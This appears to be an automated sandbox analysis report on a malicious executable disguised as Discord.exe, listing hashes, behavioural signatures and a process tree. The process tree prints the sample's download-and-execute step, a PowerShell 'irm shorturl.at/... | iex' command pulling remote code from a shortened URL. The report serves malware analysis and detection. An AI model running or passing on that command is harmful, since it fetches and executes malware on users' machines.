Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
29/09/2024, 16:05
Static task
static1
Behavioral task
behavioral1
Sample
Discord.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Discord.exe
Resource
win10v2004-20240802-en
General
-
Target
Discord.exe
-
Size
120KB
-
MD5
3d44681da2cf07c57e8c77f709213273
-
SHA1
b8268ab05b2a1cfb133ae8f99cced9de7598c079
-
SHA256
8c7b1b3f54174db0ecf87a690cacae9c74d2d2304bf60b66e3143b1a92a523d1
-
SHA512
87c6600bf71ce48d200c72c2da48856713994a378fdab52094887b2bd0118a611f1c12aebb1697ca685c01a5f36649386f4534d7d08fc070ac6edd4844679e01
-
SSDEEP
3072:QV3J6kkt5h1X+HqTi0BW69hd1MMdxPe9N9uA0/+hL9TBfnPIJn:dt5hBPi0BW69hd1MMdxPe9N9uA069TB4
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 880 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 880 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1752 wrote to memory of 2344 1752 Discord.exe 31 PID 1752 wrote to memory of 2344 1752 Discord.exe 31 PID 1752 wrote to memory of 2344 1752 Discord.exe 31 PID 2344 wrote to memory of 880 2344 cmd.exe 33 PID 2344 wrote to memory of 880 2344 cmd.exe 33 PID 2344 wrote to memory of 880 2344 cmd.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\Discord.exe"C:\Users\Admin\AppData\Local\Temp\Discord.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E16A.tmp\E16B.tmp\E16C.bat C:\Users\Admin\AppData\Local\Temp\Discord.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell "irm shorturl.at/CG3rD | iex"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:880
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
51B
MD52aed3dcc267eec515253717bf9add1b5
SHA185f480397cfc29c418edf61a1738722e537d1215
SHA256349ec9c56361b1d114b3af7ce19d413fe077b966b795aed2a0f4882258c728c8
SHA5124bab74637843769b0f4a255b875e4007a53d56c73051b679578009494e43340c5b57de67d433ac21203950b883c599451e89b9a4e6f67f6af050e3e40d71b0b1